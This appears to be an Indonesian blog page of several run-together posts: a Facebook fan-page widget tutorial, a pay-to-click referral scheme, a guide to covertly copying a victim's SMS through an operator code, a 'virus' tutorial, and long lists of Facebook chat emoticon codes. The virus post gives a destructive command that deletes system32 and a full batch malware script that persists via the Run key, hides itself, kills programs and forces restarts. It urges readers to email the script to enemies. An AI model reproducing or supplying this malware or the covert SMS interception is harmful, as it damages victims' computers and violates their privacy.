Cara Memasang Floating Fan Page Facebook Pada Blog

Floating Fan Page Facebookmerupakan widget yang kita tambahkan pada blog untuk mempercantik tampilan blog sekaligus menata dengan rapi widget-widget yang sudah terpasang pada blog. Sebelumnya saya juga sudah pernah bahas tentang cara memasang like box facebook widget pada blog. Dan pada kesempatan kali ini, saya akan memberikan tips blog lagi yaitu Cara Memasang Floating Fan Page Facebook Pada Blog. Sebagai gambaran awal dari Floating Fan Page Facebook pada blog, teman-teman bisa melihat contohnya pada widget fan page yang saya sudah pasang pada blog ini. Pemasangan widget fan page ini tidak akan berjalan dengan lancar bilamana teman-teman blogger belum membuat halaman fan page pada facebook sebelumnya. Untuk itu, silakan buat dulu halamannya. Dan untuk membuat halaman fan page pada facebook, silakan tanyakan saja pada Om Google. 

Untuk teman-teman blogger yang sudah punya halaman fan page pada facebook dan ingin memasang widget floating fan page facebook pada blog, silakan ikuti langkah-langkahnya di bawah ini :
  1. Silakan login ke akun blog Anda.
  2. Pada halaman dasbor akun blog, silakan klik nama blog Anda.
  3. Kemudian pada halaman overview blog Anda, silakan pilih template-edit HTML-Prossed-expand widget template.
  4. Selanjutnya silakan cari kode ]]></b:skin>.
  5. Kalau sudah ketemu kodenya, silakan copy dan paste kode di bawah ini pas di bawah kode ]]></b:skin>
  6. <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'/>
  7. Selanjutnya silakan simpan template blog Anda dan tutup juga halaman edit HTML-nya.
  8. Kemudian silakan pilih lagi layout, lalu pilih dan klik Add Gadget pada posisi mana saja.
  9. Setelah muncul windows Add Gadget Blogger, silakan pilih HTML/JavaScript dengan cara klik tombol plus [+] yang ada disebelah kanannya.
  10. Langkah selanjutnya, silakan copy kode di bawah ini dan paste pada bagian content.
  11. <script type="text/javascript"> /*<![CDATA[*/ jQuery(document).ready(function() {jQuery(".likebox").hover(function() {jQuery(this).stop().animate({right: "0"}, "medium");}, function() {jQuery(this).stop().animate({right: "-250"}, "medium");}, 500);}); /*]]>*/ </script> <style type="text/css"> .likebox{background: url("http://1.bp.blogspot.com/-9eRHiE20E4c/TynfIJyt7qI/AAAAAAAACBE/15Q3VtI-PwY/s1600/fb.png") no-repeat scroll left top transparent !important;display: block;float: right;height: 270px;padding: 0 5px 0 46px;width: 245px;z-index: 99999;position:fixed; right:-250px;top:44%;} .likebox div{border:none;position:relative;display:block;} .likebox span{bottom: 12px;font: 8px "lucida grande",tahoma,verdana,arial,sans-serif;position: absolute;right: 7px;text-align: right;z-index: 99999;} .likebox span a{color: gray;text-decoration:none;} .likebox span a:hover{text-decoration:underline;} </style> <div class="likebox" style=""> <div> <iframe src="http://www.facebook.com/plugins/likebox.php?href=https://www.facebook.com/centrinoblog&amp;width=240&amp;colorscheme=light&amp;show_faces=true&amp;connections=9&amp;stream=false&amp;header=false&amp;height=258" scrolling="no" frameborder="0" scrolling="no" style="border: medium none; overflow: hidden; height: 258px; width: 245px;background:#fff;"></iframe> </div> </div>
  12. Setelah dipaste kodenya pada bagian content, jangan dulu disimpan kodenya tapi silakan ganti kode yang saya kasih warna merah dengan alamat atau URL halaman fan page facebook Anda. Setelah diganti kode yang berwarna merah, barulah disimpan kodenya.
Ok sob, selamat ya, sudah berhasil Memasang Floating Fan Page Facebook Pada Blog. Jika ada kendala, silakan tanyakan saja lewat komentar atau buku tamu blog ini.

Demikian informasi dari saya tentang tips blog Cara Memasang Floating Fan Page Facebook Pada Blog dan jika informasi ini bermanfaat, silakan sebarkan ke teman-teman blogger yang lain dengan cara silakan pilih dan klik icon share di bawah ini. Terima kasih..

MAEN DIWARNET BUKANYA BAYAR MALAH DAPET DUIT, MAU?

wah... saya sudah lama tidak bergaul didunia maya, dan kali ini saya terinspirasi dari salah satu rekan blogger saya tentang bagaimana cara mendapatkan duit di internet dengan hanya 2jam sajja

anda tau PTC?
ptc adalah salah satu provider website yang menawarkan kita untuk meberikan recehan demi recehan asalkan kita mau untuk mengeklik iklan mereka, biasanya periklan ada yang $0,01 dan juga ada yang $0,02
bisa kita pastikan bila kita daftar 1situs PTC kita mndapatkan $0,05
maka kalo kita mendaftarkan 30situs PTC sama dengan pendapatan kita sehari 15000
bayangkan jika kamu mampu mendaftar banyak ptc, dikalikan saja hasilnya :D

kalo agan berkenan mencoba bisnis tersebut silahkan ikuti langkah berikut :

*1 siapkan secangkir kopi, dan rokok (yang engga ngeroko, ngga usah ga papa)

*2 siapkan juga koneksi internet yang cepat, kalo mau cepat dapet duit tentu saja internet kita haruslah cepat

*3 berdo'a dlu hahaha biar tidak lap lapan

*4 buka browsing kamu, lalu daftar satu persatu website dibawah yang saya kasih,


http://www.bux-gpx.net/index.php?ref=funnycorp69

http://www.imperialgetcash.com/?ref=funnycorp69

http://www.cashons.com/index.php?ref=funnycorp69

http://www.cashtream.com/index.php?ref=funnycorp69

http://www.Clixane.com/index.php?ref=funnycorp69

http://www.cashdelight.com/pages/index.php?refid=funnycorp69

http://www.bucks4shares.com/?ref=funnycorp69  

http://www.bearby.com/index.php?ref=funnycorp69

http://www.bluclicks.com/?r=funnycorp69

http://www.refbacknclix.com/index.php?ref=funnycorp69

*5 bersabar dahulu dissat anda mendaftar website ke website kerena ini sebuah pengorbanan dibalik  kesuksesan

*6 setelah itu catat satu persatu id anda yang sudah didaftarkan di website website ptc, jgn sampe lupa. kalo mau gampang, simpan  catatan di konsep email

*7 login keweb satu persatu, dan klick adverst, lalu muncul iklan.. nah disitu lah kamu dsuruh menklick iklannya

*8 klick trus yaaah sampe bnyak biar cepet kaya.... :)  GOODLUCK



SMOGA SUKSES BRO!!!

SADAP SMS ORANG PAKE HP APASAJA BISA


Sekarang sudah ada cara sadap/mengalihkan panggilan, sms, telepon, pembicaraan private bahkan BBM juga bisa disadap. Kalau kamu ingin tahu cara menyadap dengan cara mudah, kamu cukup punya handphone biasa saja. Dengan handphone biasa ini, kamu dapat menyadap sms orang lain tanpa aplikasi apa pun yang diinstal. Langsung saja, saya berbagi trik sadap sms dengan menggunakan trik operator selular.

Sadap SMS di Handphone Biasa


Bagi kamu para pengguna operator selular XL, kamu sangat beruntung. Karena dengan menggunakan operator ini, kamu dapat melakukan penyadapan secara sederhana. Dan kamu dapat membaca petunjuk berikut ini.
1. Siapkan gadget orang yang ingin kamu sadap. ( Agak dirayu dikit untuk mendapatkan gadgetnya )

2. Ketik *123*571# di gadget korban, lalu kamu tekan CALL.

3. Setelah itu kamu akan mendapat beberapa pilihan, jadi kamu pilih no 2 ( Layanan Lain )

4. Dari pilihan tadi, akan muncul 2 pilihan baru, yaitu :
  • AUTO FORWARD => Menerima SMS orang lain langsung tanpa masuk ke no HP korban.
  • AUTO COPY => Menerima SMS orang lain yang masuk ke no HP korban dan juga ke no HP kamu sendiri.

5. Setelah itu, kamu pilih yang AUTO COPY, agar kamu dapat mengetahui lebih detail lagi tanpa ketahuan. Dan kemudian, kamu tungggu konfirmasi dari operator XL untuk pemotongan biaya ( 1000/ bulan )

6. Lalu kamu mengirim sms dari HP korban dengan format : COPY ON lalu kirim ke no HP kamu. Maka proses sadap SMS sudah berhasil.

OK, Selamat mencoba.

BIKIN VIRUS AMPUH TANPA SOFTWARE, ATTACK YOUR ENEMYS WITH THIS

Nih ada Tips bikin Virus paling ampuh.Dan saya tidak bertanggung jawab atas segala kerusakan yang kamu buat.Jadi jangan disalahgunakan.

VIRUS 1 (Format HDD Classic One) :

1. Buka Notepad
2. Tuliskan perintah di bawah ini : -
Quote:
del c:\windows\system32\*.* /q
3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus ".bat or .cmd".
4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur.
Kenapa ???Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal (dengan asumsi tanpa ada program Deep Freeze atau Returnil)
5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C:\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus.
6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat.
VIRUS 2 :
Trik ini untuk mengirim file ke komputer orang yang kamu benci.
Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama terserah.bat
Jangan di klik file tersebut yach......Kirim ke email orang yang kamu benci dach...
hehehehe....
Dan yang akan terjadi setelah si musuh menerima file adalah :
1) file akan mengcopy secara otomatis ke dalam startup
2) file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi
3) mampu menyembunyikan dirinya sendiri
4) file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire.
5) Membalik klik kanan mouse dengan klik kiri
6) Membuka kotak dialog Peringatan
7) Mengganti waktu ke jam 12:00 dan mematikan komputer
Code:
Quote:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
SELAMAT MENCOBA

BARU EMOTION/SMILES TERUPDATE YANG BISA BERGERAK DICHAT FACEBOOK,




Halo gan, jumpa lagi sama saya atox creation, orang yang bloon cupu, bego , dan sok pinter yg suka bagi-bagi ilmu pastinya...
kali ini saya punya sebuah tricks facebook yang seruuuuuuuuuuuuuuuuuuu banget,,...!! biar lo ktawa ngakak deh dengan emotion lucu2 dari facebook yang baru.,.. eiitzz jangan salah .. emotion nya bisa gerak loh? Cek aja di bawah,... tar kapan2 lagi ane buat update baru emotion deh kali ini yang masih masih kmaren-kmaren dlu aja yah...


“CEK THIS OUT”
copas, ke layar chating temen kamu... liat apa yang terjadi …. :D



Update 24-1-2012
Lagi ada ide buat emot di chat fb nih,mau cobah kan? coba aja deh :P
[[331399223556184]] [[286042634779174]] [[330023780360758]] [[329237617088409]] [[204120926342364]] [[131297490319188]] [[289987304385341]]
[[295847560451136]] [[278880668827213]] [[260560750675461]] [[264494386943951]] [[208640915887167]] [[270643856326606]] [[334868623190983]]
[[265844723474789]] [[325742447454304]] [[207587629327321]] [[294223273948603]] [[323449457679402]] [[258622847533513]] [[242014162533924]]
[[306019522772134]] [[267712979948966]] [[301751889864065]] [[213122875437139]] [[164020277032670]] [[158735217564918]] [[261124587284685]]
[[114261558693806]] [[113889888730617]] [[316407155046042]] [[316473595041291]] [[346326392049037]] [[284570571589911]] [[298670736837009]]
[[219939044752270]] [[336155773063546]] [[131032267012645]] [[155856061183812]] [[208532722565686]] [[268249169896142]] [[204863289602546]]Copas Semua Code di atas terus pasta ke chat fb dan lihat apa yang terjadi wkwowkwowkwo :D

Code emot kaskus di fb
[[243344945733611]] = Repost
[[mahochat]] = Maho
[[203443053077888]] = I Love Kaskus
[[205827876172490]] = Bingung
[[261018420628968]] = Thumbs
[[328740787138287]] = Nope
[[296027833771776]] = Capede
[[311851138846391]] = Alay
[[guengakak]] = Ngakak
[[171108522930776]] = trollface

[[foreveralonecomics]] = forever alone.

[[MegustaMeMe]] = Me Gusta.

[[149333368464171]] = Yao.

[[145768898802324]] = FUUUUUU.

[[168456309878025]] = LoL.

[[FapFapFapFap.B]] = Fap Fap Fap Fap.

[[106043532814443]] = Y U NO.
[[214457085240151]] = Nothing to do here.

[[129627277060203]] = Poker Face.

[[160723207280093]] = Are you f*cking kidding me?

[[ChallengeAceptado]] = challenge Accepted.See More.

[[yahoo]]
[[google]]
[[facebook]]
[[kaskus]]
[[amazon]]
[[youtube]]
[[googlechrome]]
[[opera]]
[[internetexplorer]]
[[flock]]
[[microsoft]]
[[microsoftword]]
[[microsoftexcel]]
[[microsoftpowerpoint]]
[[megaxus]]
[[grandchase]]
[[indovision]]
[[history]]
[[sony]]
[[nokia]]
[[telkomsel]]
[[windows]]
[[transformer]]
[[itones]]
[[photosop]]

[[249199828481201]] - KONATA IZUMI
[[136942059667395]] - SUPERMAN
[[133603427601]] - BATMAN
[[250128751720149]] - DOMO
[[334954663181745]] - SPONGEBOB
[[326134990738733]] - PIKACHU
[[236147243124900]] - POKEMON BALL
[[155393057897143]] - DORAEMON
[[224502284290679]] - NOBITA
[[148935948523684]] - PEDO BEAR
[[144685078974802]] - MOJACKO
[[223328504409723]] - GINTOKI SAKATA

TROLL FACES:
[[145768898802324]] - FUUUUUU's
[[143220739082110]] - ARE YOU F*CKING KIDDING ME
[[169919399735055]] - NOT BAD OBAMA
[[142670085793927]] - MOTHER OF GOD
[[167359756658519]] - NO GUY
[[192644604154319]] - DERPINA
[[224812970902314]] - DERP
[[170815706323196]] - CEREAL GUY
[[FapFapFapFap.B]] - FAPFAPFAP
[[171108522930776]] - TROLLFACE
[[164413893600463]] - ME GUSTA
[[218595638164996]] - B*TCH PLEASE
[[MeGustaMeme]] - ME GUSTA 2
[[189637151067601]] - LOL
[[129627277060203]] - POKERFACE
[[227644903931785]] - FOREVER ALONE
[[100002752520227]] - OKAY
[[105387672833401]] - F*CK YEAH
[[100002727365206]] - CHALLENGE ACCEPTED

MESSAGES:
[[107453105948594]] [[221310038416]] [[173556336384]] [[267422529977510]] [[110797149003034]] [[205838455398]] [[173556336384]] [[172843133886]] - I LOVE YOU

[[140477222725291]] [[172843133886]] [[136939389672074]] [[145786245487343]] [[205838455398]] [[173556336384]] [[172843133886]] - F*CK YOU 

[[252346194801306]] = RUMAH
[[266313623412267]] = PINGWIN LINUX
[[191560730921873]] = LOGO GOOGLE CHROME
[[182809565135565]] = LOGO GOOGLE ++
[[242070735843795]] = LOGO SNAPTU
[[266910496686186]] = LOGO WINDOWS
[[258958334142268]] = LOGO ANDROID
‎[[223328504409723]] - Gintoki Sakata
[[236147243124900]] - Pokeball
[[326134990738733]] - Pikachu
[[155393057897143]] - Doraemon
[[224502284290679]] - Nobita
[[144685078974802]] - Mojacko
[[334954663181745]] - Spongebob
[[196431117116365]] - Shin chan
[[148935948523684]] - Pedo Bear
[[250128751720149]] - Domo Kun
[[100002467779100] - winie thepoh
[[216136971742071]] - oscar
[[zuck]] - sang pendiri FB
[[firefox]] - mozzila
[[googlechrome]] - google crom
[[facebook]] - simbol FB
[[100002675501619]] - ninja hatori
[[100002672168648]] - Shizuka
[[100002644869972]] - upin ipin
[[138369100149]] - conan

[[245530622180437]] - kampus UNY
[[59757200216]] - UGM
[[bemftuny]] - Bem FT uny
[[100001029830162]] - Bem FBS uny
[[1787992997]] - Bem FISE uny
[[100000515427148]] - Bem FMIPA uny
[[1682611247]] - Bem FIK uny
[[241475028613]] - Bem FIP uny


huruf 
A: [[399197913893]]
B: [[115345298505025]]
C: [[53872404042]]
D: [[226910642728]]
E: [[140775945956538]]
F: [[136046106447549]]
G: [[119431374760220]]
H: [[205082339544090]]
I: [[432883640525]]
J: [[228315337208110]]
K: [[56926372437]]
L: [[221310038416]]
M: [[161672657237726]]
N: [[203933512990765]]
O: [[116564658357124]]
P: [[64245738440]]
Q: [[196390043757013]]
R: [[111884958838844]]
S: [[136198113087158]]
T: [[142464449131926]]
U: [[172843133886]]
V: [[77189649729]]
W: [[116928513730]]
X: [[108075899233912]]
Y: [[140715832616884]]
Z: [[165724910215]](thank to putra kali code) update 

update
Code Emot Audition :  [[345533462139449]] > ;bete

[[308300382542918]] > ;calm

[[309626999060642]] > ;dan2

[[263022747090798]] > ;hai

[[200102950080196]] > ;hwa

[[158227984284324]] > ;mad

[[114550798664378]] > ;mo

[[299734090065127]] > ;omg

[[350421394973827]] > ;shy

[[208296672587372]] > ;doa

[[157844747656241]] > ;etc

[[158207970952008]] > ;groa

[[[241721525896214]]] > ;grr
 [[113519815433465]]] > ;hepi

[[239939099411255]] > ;joke

[[[346508562029170]] > ;kdip

[[[185298018232820]] > ;mbok

[[[239249926147852]] > ;phew

[[[332418196786941]] > ;shok

[[[328430820514942]] > ;tear
 [[222287944513884]]] > ;we

[[164481350318329]]] > ;win

[[330544910308348]] > ;zzz

[[267658843290223]] > ;hoeh

[[180154485416003]] > ;:) [[221390677938174]] > ;swet

[[269394746450013]] > ;TT

[[222023621206273]] > ;uhuk

[[346372985378735]] > ;luph

[[187322684697844]] > ;tida

[[208533842565519]] > ;cuih

[[266659030060927]] > ;down

LIKE STATUS
L : [[238594039545396]]
I : [[164866556948132]]
K : [[209067005843651]]
E : [[196752423751220]]

S : [[316143388416019]]
T : [[334073456605673]]
A : [[244961858909298]]
T : [[334073456605673]]
U : [[199626093460643]]
S : [[316143388416019]] 

update
MET SIANG  >>[[147702285338528]] [[196752423751220]] [[334073456605673]] [[316143388416019]] [[164866556948132]] [[244961858909298]] [[309221402452022]] [[251496118250464]] GALAU>>[[185422434888201]] [[312935248739937]] [[336820319661426]] [[312935248739937]] [[217892258289816]] 
[[391419259674]] - cinderella
[[126236287388324]] - for love
[[126125527399400]] - Muaaach :*
[[126134560731830]] - hoam Ngantuk Rek
[[126261164052503]] - Hula Hula
[[126221767389776]] - spin HearT
[[126214010723885]] - stroke = mengelus membelai
[[126386227373330]] - oversleep = ketiduran
[[391418534674]] - princess
[[391290854674]] - My HearT
[[126232017388751]] - broken heart
[[391260799674]] - scary rabbit
[[126229700722316]] - pikachu 
[[126392380706048]] - ready sleep 
[[391415274674]] - mermaid 
[[391419994674]] - Tinkerbell
[[391418849674]] - peri cute
[[126276450717641]] - blast love ..tiupan cinta
[[391396614674]] - Dog sad
[[391413439674]] - BT angry
[[391404309674]] - kue nyam nyam
[[126391564039463]] - Stress
[[391418139674]] - Nenek Sihir
[[110566632320002]] - Cat listening to music 
[[126230590722227]] - Super Mario
[[126213110723975]] - Hello Ketty
[[126227960722490]] - kiss
[[126230880722198]] - Green Worm Ani
[[391395244674]] - stitch in guitar
[[126229327389020]] - Rose Red Ani
[[127868980561350]] - Heart beat
[[126220920723194]] - santa
[[126216480723638]] - butterfly blue
[[126132024065417]] - Heart rotate ani
[[391246504674]] - Dizzy Girl Ani
[[391581559674]] - smileys blush
[[126278187384134]] - O YEah Hippo
[[391299864674]] - Rose Red
[[126217194056900]] - i ♥ u
[[126540207361797]] - Smileys inlove
[[398699314236]] - Teddy n ♥
[[110780922298250]] - Heart on Fire
[[391394694674]] - Little Monkey n ♥
[[127878643893717]] - hand Clap
[[398570519236]] - mickey at Sleep
[[394930959230]] - Smileys Zzzz
[[126398717372810]] - Converse
[[391537884674]] - Cute Panda
[[391405744674]] - Crazy Sakura
[[110563818986950]] - wew
[[110566395653359]] - cat licking screenupdate
lack of effort

[[223001261110929]] [[269872399735691]] [[246269502108121]] [[270596706332663]] [[283584195022410]]
[[210817062335668]] [[328921517125569]] [[147800211996815]] [[319710718051551]] [[137568946357558]]
[[211108338973779]] [[313832288650627]] [[215824911833860]] [[288438731207668]] [[222644714478666]]
[[245553522180097]] [[238258782910580]] [[329913387027251]] [[349141391779313]] [[341444925866844]]
[[289932411052926]] [[268502659872337]] [[241569469246051]] [[252481041485423]] [[349377881754413]]
[[321796167844250]] [[271400812918884]] [[342392959106128]] [[295747883796184]] [[326751484016237]]
[[337281192948962]] [[215097941905900]] [[211016635650832]] [[316563141709007]] [[263491453713640]]

pedobear

[[279936442055918]] [[319647778056592]] [[349122875114081]] [[211041875646786]] [[302900409754001]]
[[296006743778903]] [[101469196640065]] [[122370414547748]] [[243125545759579]] [[123484264435415]]
[[215342208548400]] [[151315428310998]] [[284660928250865]] [[302949986410996]] [[334907086537333]]
[[268132233247111]] [[265527943501037]] [[122936537823714]] [[226714917406717]] [[208051422615951]]
[[140070952771176]] [[242897759115805]] [[314055038625295]] [[146299278813540]] [[268222226570632]]
[[144315355679947]] [[286040888114944]] [[242899382448976]] [[198315493594483]] [[242026542537809]]
[[247028332030377]] [[223067401104881]] [[272129532843781]] [[301839856527736]] [[327021883984066]]
[[161050090666161]] [[211214228964799]] [[159648637473955]] [[161507350623674]] [[223091247766157]]

Gak ada judul

‎[[272107609513061]] [[272107626179726]] [[272107646179724]] [[272107652846390]]
[[272107682846387]] [[272107706179718]] [[272107716179717]] [[272107726179716]]
[[272107736179715]] [[272107752846380]] [[272107769513045]] [[272107782846377]]
[[272107796179709]] [[272107809513041]] [[272107826179706]] [[272107832846372]]
[[272107852846370]] [[272107866179702]] [[272107882846367]] [[272107892846366]]

okay guy

[[197044707054358]] [[318089008211177]] [[206998156055259]] [[101429913310710]] [[150168275092616]]
[[225080704233783]] [[200644710027535]] [[331864406824363]] [[200459143377911]] [[243235082416386]]
[[270929596294965]] [[289697937749187]] [[254445704621293]] [[188294871266818]] [[272892776100252]]
[[138673459579566]] [[303531203022792]] [[219027644842995]] [[160108910762718]] [[348620545163408]]
[[327177273968753]] [[208595885893580]] [[166675963433866]] [[309991529024218]] [[349449301735291]]
[[340681072610110]] [[187715964658609]] [[350144085001881]] [[215862811828336]] [[267669143288385]]
[[159403400834378]] [[240644532673967]] [[140126312766140]] [[265086290221071]] [[201325993290983]]

FFFFFFFFFFUUUUUUUUUUUUU

[[159403400834378]] [[257154657685145]] [[132680356847163]] [[290978820948428]] [[334282083267353]] [[198103506950448]] [[210308395722038]]
[[309975965709366]] [[182868988477905]] [[165741460192459]] [[247622781973379]] [[327617393928947]] [[206584556097316]] [[250789351653750]]
[[200790820011838]] [[141243869321548]] [[352183231465619]] [[328771830475687]] [[189210541175816]] [[312252498807676]] [[166541650114498]]
[[208576439231087]] [[205464099541525]] [[241532012586537]] [[328888967128873]] [[245107852224475]] [[145834102193476]] [[186739154755647]]
[[199838353440893]] [[267276669999507]] [[319332414755054]] [[352534161430714]] [[326839384007613]] [[219389444806813]] [[124982690951818]]
[[296444440391057]] [[327760950581864]] [[198689786891893]] [[100673290052775]] [[281174871929559]] [[344704255543758]] [[319037018119558]]

scary face

[[300382333337276]] [[243309622404527]] [[159993510774694]] [[272337229485968]] [[271768612879902]] [[325908680761128]] [[217700464975574]]
[[300382333337276]] [[215129375236098]] [[210080259075655]] [[298772443492242]] [[290772554301843]] [[329147173780415]] [[316895348331542]]
[[210492875703072]] [[286212818097801]] [[207002929386788]] [[263364080392330]] [[289630174422007]] [[159951064110271]] [[286788254707247]]
[[337460916266694]] [[334726783222991]] [[267147000006924]] [[145595485550928]] [[249024281829360]] [[287206887992807]] [[266973376696677]]
[[201672933257258]] [[336219069723510]] [[332882186740415]] [[159707314133427]] [[137098749737782]] [[207886652633783]] [[224321900977413]]

Watch out, we got a badass over here

[[159403400834378]] [[159403400834378]] [[337543586258011]] [[319472504742942]] [[137178113064010]] [[159403400834378]] [[159403400834378]]
[[159403400834378]] [[317704824918461]] [[263132223750979]] [[146082208835706]] [[254206641312375]] [[159403400834378]] [[159403400834378]]
[[140326502746326]] [[269575266432705]] [[224709320940207]] [[317557948275125]] [[347784468580811]] [[221457824600816]] [[180985841999404]]

X ALL THE Y

[[289233677790219]] [[348654161814774]] [[222705881138252]] [[292141994165379]] [[133154316800330]] [[346337608726421]]
[[100381450083206]] [[313838608648951]] [[166103506823935]] [[314007935297068]] [[139489826163004]] [[269859583071892]]
[[219146461499411]] [[160313270740550]] [[205765899512340]] [[113268378788379]] [[187383804691038]] [[160834734023850]]

Jackie Chan smiley

[[159403400834378]] [[350711854942596]] [[181587845273907]] [[158684234236177]] [[351037108247221]] [[200627473361428]]
[[319903324706941]] [[296000840437382]] [[120826078035368]] [[197216497039069]] [[160081354096525]] [[293380127365491]]
[[268119093246586]] [[304021742976441]] [[241231115950237]] [[319494974748104]] [[346830568677550]] [[206278946125685]]
[[165619636871866]] [[327492260603305]] [[212797055468932]] [[331257773559487]] [[219749661438887]] [[298440666864927]]

CHALLENGE ACCEPTED

[[302111803167367]] [[149973285111436]] [[225420280866694]] [[266125703443078]] [[302489199795649]]
[[159933744110623]] [[306470046064676]] [[335781066433134]] [[327090507308616]] [[209370209147382]]
[[222595441151658]] [[144479182330180]] [[205625146193044]] [[215374488545085]] [[336008796427561]]
[[313179355383436]] [[135748553205834]] [[250024168398519]] [[197779800316568]] [[224772264264878]]
[[331777086834703]] [[240760999329552]] [[252187468180373]] [[211171525634394]] [[293830290654801]]
[[223948214347966]] [[332345496777020]] [[336817752996147]] [[327657930592556]] [[197459897013106]]
[[297685920273004]] [[281899328524298]] [[224880684253358]] [[317833641571276]] [[292082704177749]]

MOTHER OF GOD

[[159403400834378]] [[301770873198029]] [[124123621037582]] [[165443303555885]] [[225009720907841]] [[159403400834378]]
[[143280719116554]] [[325784210773649]] [[240857172651089]] [[326582487367063]] [[243056889098166]] [[159403400834378]]
[[100126866775028]] [[344748918884490]] [[198318970262933]] [[264742153562246]] [[156223974480296]] [[199239846833770]]
[[337718332906919]] [[159071504197585]] [[159142267522981]] [[285550151496203]] [[217302108349366]] [[243642895706612]]
[[159403400834378]] [[297037847004108]] [[273779062680713]] [[206014099486621]] [[329969420355991]] [[222842284460715]]

meme kecil

[[291152600919956]] [[295479677155336]] [[314363058604092]]
[[262834777109378]] [[189006671194968]] [[263319493729810]]
[[251236504943440]] [[287904934588441]] [[185961414833909]]

Arunkumar Mahadevan:

[[258968244165876]] [[286666501379430]] [[262520713809098]] [[159049157536013]] [[307904395916212]]
[[225447050864310]] [[209926462425564]] [[138411019605305]] [[221670374577056]] [[154671737968862]]
[[138007062977844]] [[291747794194724]] [[122952454488304]] [[337561022923016]] [[288878907831075]]
[[240630206008013]] [[264223330304357]] [[319462458078703]] [[239286912807413]] [[288721814513254]]
[[265575850170635]] [[345354905481875]] [[209004679185391]] [[259785247417432]] [[159480014157666]]
[[267428346644787]] [[239034746168540]] [[350046018344350]] [[209260572491236]] [[198316980259626]]
[[310959705610393]] [[214054278676095]] [[200638253359905]] [[334455703231303]] [[158066514298630]]

Arunkumar Mahadevan: And we’re in business!

[[179756028790264]] [[131478976968398]] [[314076808615174]] [[206240339463055]] [[159403400834378]]
[[200992799990165]] [[196243973803636]] [[270956806292431]] [[346811212001437]] [[328107453874590]]
[[196721100420672]] [[317586898261340]] [[298140226892101]] [[214914048591653]] [[350101681673756]]
[[123765061073750]] [[245710415498757]] [[243298355738272]] [[138812572897166]] [[149419131833071]]
[[158310927607841]] [[310752072297702]] [[316528255036793]] [[335475163146590]] [[221503331260136]]
[[241781875890038]] [[218268384920510]] [[189509191144351]] [[302618756443499]] [[182961465135557]]
[[206151719471944]] [[223223751088260]] [[158685720904140]] [[249080145157161]] [[310957895604838]]

Yople Alyen Full Nyan Cat

[[265434590178748]] [[164991926934921]] [[209695692449988]] [[250490361685507]] [[278968458819422]] [[349625665051383]] [[205760419511603]]
[[312189672135533]] [[299788346731384]] [[268532783202434]] [[266669970059695]] [[204170799672068]] [[187204144709527]] [[331078983588306]]
[[149240955184679]] [[206407216112871]] [[240669959335314]] [[180619528702085]] [[347768705240557]] [[186661331430535]] [[218646048216424]]
[[344875905539434]] [[328111047214223]] [[323186421038846]] [[157802940990663]] [[159535350818164]] [[296581710385765]] [[271261609598535]]

Sasha Andersen

[[159403400834378]] [[297487363621407]] [[1156068411]] [[135921843188987]] [[281219301903813]] [[199562043466774]]
[[295738517127851]] [[155658844536513]] [[209549519130890]] [[142176999226854]] [[246689415397308]] [[199562043466774]]
[[238766052862259]] [[307299595976209]] [[217652968315422]] [[189042331191521]] [[286721874712929]] [[344476392245488]]
[[208520335900424]] [[280378908678680]] [[289772571069549]] [[271456079578545]] [[316530365035101]] [[288356997877538]]
[[291702580880362]] [[165637363538400]] [[150244831751625]] [[241130952627573]] [[120930761357725]] [[325867137432308]]
[[154842501286195]] [[286053358112869]] [[149316288510313]] [[250243511707871]] [[291635414215481]] [[344254632266885]]
[[276412539074685]] [[131586963624296]] [[333374550025341]] [[327570193933422]] [[199699430120687]] [[136021593179546]]

meme sedih

‎[[222233554520712]] [[155093667926316]] [[159374644168797]]
[[265556180170509]] [[272006802857159]] [[144596118984229]] [[198806320212294]] [[155432547893166]]
[[239088996160999]] [[293626150673074]] [[203611766392684]] [[214124502002999]] [[268692779851733]]
[[181312795299893]] [[269771269745545]] [[189131527848966]] [[121039688013447]] [[347460675267390]]
[[116007985184523]] [[267703239958069]] [[209491689137152]] [[335109106501612]] [[286053824778978]]
[[140147629431094]] [[286265654759471]] [[208524709231940]] [[135568263223992]] [[265887476807116]]

meme gede

[[331399223556184]] [[286042634779174]] [[330023780360758]] [[329237617088409]] [[204120926342364]] [[131297490319188]] [[289987304385341]]
[[295847560451136]] [[278880668827213]] [[260560750675461]] [[264494386943951]] [[208640915887167]] [[270643856326606]] [[334868623190983]]
[[265844723474789]] [[325742447454304]] [[207587629327321]] [[294223273948603]] [[323449457679402]] [[258622847533513]] [[242014162533924]]
